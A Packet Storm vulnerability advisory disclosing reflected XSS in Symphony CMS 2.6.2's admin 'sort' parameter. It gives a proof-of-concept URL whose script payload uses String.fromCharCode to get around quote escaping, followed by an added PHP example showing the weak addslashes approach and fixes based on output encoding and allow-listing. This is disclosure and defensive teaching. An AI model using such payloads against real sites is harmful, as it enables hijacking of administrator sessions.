packetstorm | Hyp3rlinx | PACKETSTORM:132193
History: Jun 07, 2015 - 12:00 a.m.

Symphony CMS 2.6.2 Cross Site Scripting

2015-06-07 00:00:00
hyp3rlinx
packetstormsecurity.com

EPSS: 0.002 (Low), percentile 57.7%

`[+] Credits: John Page ( hyp3rlinx )  
  
[+] Domains: hyp3rlinx.altervista.org  
  
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-SYMPHONY0606.txt  
  
  
  
Vendor:  
================================  
www.getsymphony.com/download/  
  
  
Product:  
================================  
Symphony CMS 2.6.2  
  
  
Advisory Information:  
================================================  
Symphony CMS XSS Vulnerability  
  
  
  
Vulnerability Details:  
=====================  
The 'sort' parameter used by the author search in the Admin area is exploitable for XSS.  
Symphony seems to escape injected strings, e.g. 'HELL' becomes \'HELL\', but  
we can easily defeat that using the JavaScript functions charCodeAt() &  
fromCharCode().  
  
e.g.  
String.fromCharCode(72,69,76,76)  
  
Now we can output our 'HELL' strings, construct URLs etc...  
  
  
Exploit XSS code(s):  
====================  
  
http://localhost/symphony-2.6.2/symphony/system/authors/?sort=  
</h1><script>alert(String.fromCharCode(72,69,76,76))</script><h1>&order=asc  
  
  
Disclosure Timeline:  
=========================================================  
  
  
Vendor Notification: June 5, 2015  
June 6, : Public Disclosure  
  
  
  
Severity Level:  
=========================================================  
Med  
  
  
  
Description:  
==========================================================  
  
Request Method(s):  
[+] GET  
  
Vulnerable Product:  
[+] Symphony CMS 2.6.2  
  
Vulnerable Parameter(s):  
[+] sort  
  
Affected Area(s):  
[+] symphony/system/authors/  
  
===============================================================  
  
(hyp3rlinx)  
`
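
Why quote escaping does not stop this, and what does, as an added example that is not part of the original advisory and is not Symphony's code. The heading template, the function names and the allow-list of sort columns are assumptions made for illustration; the sample input is the 'sort' value from the advisory's URL.

```php
<?php
// Added example: not Symphony's code. Template, names and allow-list are hypothetical.

// Sample input: the 'sort' value quoted in the advisory above.
$sort = '</h1><script>alert(String.fromCharCode(72,69,76,76))</script><h1>';

// Weak: only quotes and backslashes are escaped. The value contains neither
// (fromCharCode() avoids string literals), so the markup reaches the page intact.
function render_heading_weak(string $sort): string
{
    return '<h1>Authors sorted by ' . addslashes($sort) . '</h1>';
}

// Mitigation 1: encode for the HTML context at output time, so that
// '<', '>', '&' and both quote characters become entities.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_heading_encoded(string $sort): string
{
    return '<h1>Authors sorted by ' . h($sort) . '</h1>';
}

// Mitigation 2: a sort key is not free text. Accept only known column names
// (assumed list) and fall back to a default for anything else.
const ALLOWED_SORT = ['name', 'email', 'last_seen'];

function validated_sort(?string $sort, string $default = 'name'): string
{
    return in_array($sort, ALLOWED_SORT, true) ? $sort : $default;
}

// Quote escaping alone: the <script> element survives unchanged.
echo render_heading_weak($sort), "\n";

// Output encoding: the value is rendered as inert text.
echo render_heading_encoded($sort), "\n";

// Validation plus encoding: the unexpected value is replaced by the default.
echo render_heading_encoded(validated_sort($sort)), "\n";
```

Applying both mitigations keeps the page safe even if a new code path forgets one of them: validation constrains what the parameter can mean, and encoding constrains how any value is rendered.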
